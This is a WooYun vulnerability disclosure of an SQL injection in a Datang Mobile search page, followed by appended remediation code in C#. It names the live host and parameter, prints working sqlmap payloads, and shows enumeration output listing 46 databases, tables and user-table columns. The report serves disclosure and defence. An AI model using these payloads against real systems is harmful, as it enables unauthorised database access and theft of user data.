Vulnerability Summary

Defect ID: wooyun-2014-074221

Title: Datang Mobile (大唐移动) SQL injection vulnerability

Vendor: Datang Mobile (大唐移动)

Author: cf_hb

Submitted: 2014-08-28 18:21

Fix deadline: 2014-10-12 18:22

Disclosed: 2014-10-12 18:22

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2014-08-28: Actively contacting the vendor and waiting for it to claim the report; details withheld from the public
2014-10-12: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

A serious SQL injection vulnerability exists; 46 databases were found that could be dumped through it, exposing a large amount of sensitive user information.

Details:

As good practice, first confirm who the target belongs to:
URL: http://www.datangmobile.cn/
Screenshot:

[screenshot: index.jpg]


Injection point: http://219.142.67.31/Search.aspx?KeyWords=12
Parameter: KeyWords is not filtered, or not filtered strictly enough.
Current user:
Place: GET
Parameter: KeyWords
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: KeyWords=12%' AND 7149=7149 AND '%'='
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: KeyWords=12%' AND 2363=CONVERT(INT,(SELECT CHAR(113)+CHAR(110)+CHAR(122)+CHAR(119)+CHAR(113)+(SELECT (CASE WHEN (2363=2363) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(109)+CHAR(108)+CHAR(121)+CHAR(113))) AND '%'='
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: KeyWords=12%' AND 7894=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='
---
[14:49:52] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[14:49:52] [INFO] fetching current database
[14:49:52] [INFO] retrieved: DTN
current database: 'DTN'
[14:49:52] [INFO] fetching database users
[14:49:53] [INFO] the SQL query used returns 2 entries
[14:49:53] [INFO] retrieved: dbuser
[14:49:54] [INFO] retrieved: sa
database management system users [2]:
[*] dbuser
[*] sa
Listing the databases with sqlmap:
[14:42:19] [INFO] fetching database names
[14:42:20] [INFO] the SQL query used returns 46 entries
available databases [46]:
[*] book
[*] book_sh
[*] CommunityServer
[*] Contract
[*] ContractNew
[*] CSCarReservation
[*] db_contract_crm
[*] DB_FW
[*] db_srm
[*] DB_ZHGL
[*] dcwq
[*] distribution
[*] DT_HRInfoPublish
[*] DT_Inforeg
[*] Dt_library
[*] DT_RDInformation
[*] DT_TaskSupervision
[*] DT_zhaopin
[*] DTBBS
[*] DTMobile_EAI
[*] DTMobile_QM
[*] DTN
[*] DTS
[*] employee
[*] feedback
[*] Feedback_sh
[*] feedbackNew
[*] feedbacktest
[*] HelpDesk2
[*] HelpDesk3
[*] Intranet
[*] jecn
[*] jecnOld
[*] master
[*] medicine
[*] model
[*] msdb
[*] NSurvey
[*] PDM
[*] Reservation
[*] RoomReservationV2
[*] Task
[*] tempdb
[*] YQYBRoomReservation
[*] ZDTDX
[*] zdtlwd
Browsing the current database:
Database: DTN
[30 tables]
+----------------------+
| DTKY_Article |
| DTKY_Category |
| DTKY_Column |
| DTKY_Per_Picture |
| DTKY_Periodical |
| DTN_BaseDict |
| DTN_Category |
| DTN_Count |
| DTN_NEWNews |
| DTN_News |
| DTN_NewsAttach |
| DTN_NewsCategory |
| DTN_NewsLog |
| DTN_Remark |
| DTN_Role |
| DTN_ShareUser |
| DTN_Topic |
| DTN_User |
| DTS_V_AdminDeptPower |
| DTS_V_DownLoadNote |
| DTW_Cases |
| DTW_Category |
| DTW_Content |
| DTW_Link |
| DTW_LinkNew |
| DTW_Product |
| DTW_Project |
| DTW_Service |
| dtproperties |
| pangolin_test_table |
+----------------------+
Columns:
Database: DTN
Table: DTN_User
[7 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| Department | nvarchar |
| DisplayName | nvarchar |
| EMail | nvarchar |
| LastLogin | datetime |
| LocalID | nvarchar |
| SAMAccount | nvarchar |
| UserID | int |
+-------------+----------+
Looking at another database:
Database: DTS
[29 tables]
+--------------------------+
| DTS_Admin |
| DTS_AdminDeptPower |
| DTS_AdminPower |
| DTS_Article |
| DTS_ArticleAttach |
| DTS_BBS_Blacklist |
| DTS_BBS_Forum |
| DTS_BBS_ForumAdmin |
| DTS_BBS_ForumAttach |
| DTS_BBS_ForumPost |
| DTS_BBS_ForumTopic |
| DTS_BBS_VoteItem |
| DTS_BBS_VoteLog |
| DTS_Category |
| DTS_ClearData |
| DTS_Data |
| DTS_DataAttach |
| DTS_Dict |
| DTS_DownLoadNote |
| DTS_Product |
| DTS_ProductSeries |
| DTS_ProductSuggest |
| DTS_ProductSuggestAttach |
| DTS_Survey |
| DTS_User |
| DTS_V_AdminDeptPower |
| DTS_V_DownLoadNote |
| DTS_VisitStatistic |
| dtproperties |
+--------------------------+
With 46 databases, going through them one by one would certainly turn up a lot of sensitive user data; dumping everything would probably take a day or the better part of one!!
Some of the data in one of the tables:
Database: DTS
Table: DTS_User
[18 entries]
+------+--------------+-------------+---------+---------+-------------+----------+----------+--------------+-----------------------------+----------+-------------------+------------------------+------------+-------------+--------------+
| ID | UserID | DeptPowerID | UserSex | PostNum | UserPWD | UserName | UserType | UserNick | UserMail | UserNote | UserPhone | CreateDate | ActiveFlag | UserAddress | UserCompany |
+------+--------------+-------------+---------+---------+-------------+----------+----------+--------------+-----------------------------+----------+-------------------+------------------------+------------+-------------+--------------+
+------+--------------+-------------+---------+---------+-------------+----------+----------+--------------+-----------------------------+----------+-------------------+------------------------+------------+-------------+--------------+
I have not gone through the other tables and databases; the aim is only to show how serious this hole is. Please fix it quickly!!

Proof of vulnerability:

See above!

Remediation:

Strictly filter user-submitted parameters.
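The payload shape sqlmap reported (12%' AND 7149=7149 AND '%'=') shows that the KeyWords value is being spliced into a LIKE '%...%' pattern as SQL text. As an added example, not code from the report or from the site, here is that vulnerable construction next to the parameterised form that removes the injection for an ASP.NET/SQL Server application; the connection, the NewsID/Title columns and the choice of the DTN_News table as the search target are assumptions for illustration.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example (not from the report). Table/column names are assumptions.
public static class SearchRepository
{
    // BEFORE: KeyWords is concatenated straight into the LIKE pattern.
    // A value like  12%' AND 7149=7149 AND '%'=  closes the quoted
    // pattern and appends attacker-chosen SQL, which is exactly the
    // boolean-, error- and time-based shapes sqlmap found above.
    public static string BuildVulnerableQuery(string keyWords)
    {
        return "SELECT NewsID, Title FROM DTN_News WHERE Title LIKE '%" + keyWords + "%'";
    }

    // AFTER: the value travels as a typed parameter, never as SQL text.
    // Quotes, comments and AND/OR in the input are just characters to
    // match. LIKE metacharacters are escaped too, so a user cannot turn
    // "%" or "_" into wildcards and enumerate the table that way.
    public static DataTable SearchNews(SqlConnection conn, string keyWords)
    {
        if (string.IsNullOrEmpty(keyWords) || keyWords.Length > 100)
            throw new ArgumentException("KeyWords missing or too long");

        string pattern = "%" + EscapeLikePattern(keyWords) + "%";
        const string sql =
            "SELECT NewsID, Title FROM DTN_News WHERE Title LIKE @pattern ESCAPE '\\'";

        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 4000).Value = pattern;
            var table = new DataTable();
            using (var reader = cmd.ExecuteReader())
                table.Load(reader);
            return table;
        }
    }

    // Escape SQL Server LIKE metacharacters with a backslash (matches ESCAPE '\').
    public static string EscapeLikePattern(string s)
    {
        return s.Replace("\\", "\\\\")
                .Replace("%", "\\%")
                .Replace("_", "\\_")
                .Replace("[", "\\[");
    }
}
```

The enumeration above also reached all 46 databases, including master and msdb, so alongside the query fix the application's database login should be restricted to the one database it needs with the least privilege that the search requires.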

Copyright notice: please credit the source when reposting: cf_hb@WooYun


Vulnerability Response

Vendor response:

The vendor could not be reached, or the vendor actively declined to respond.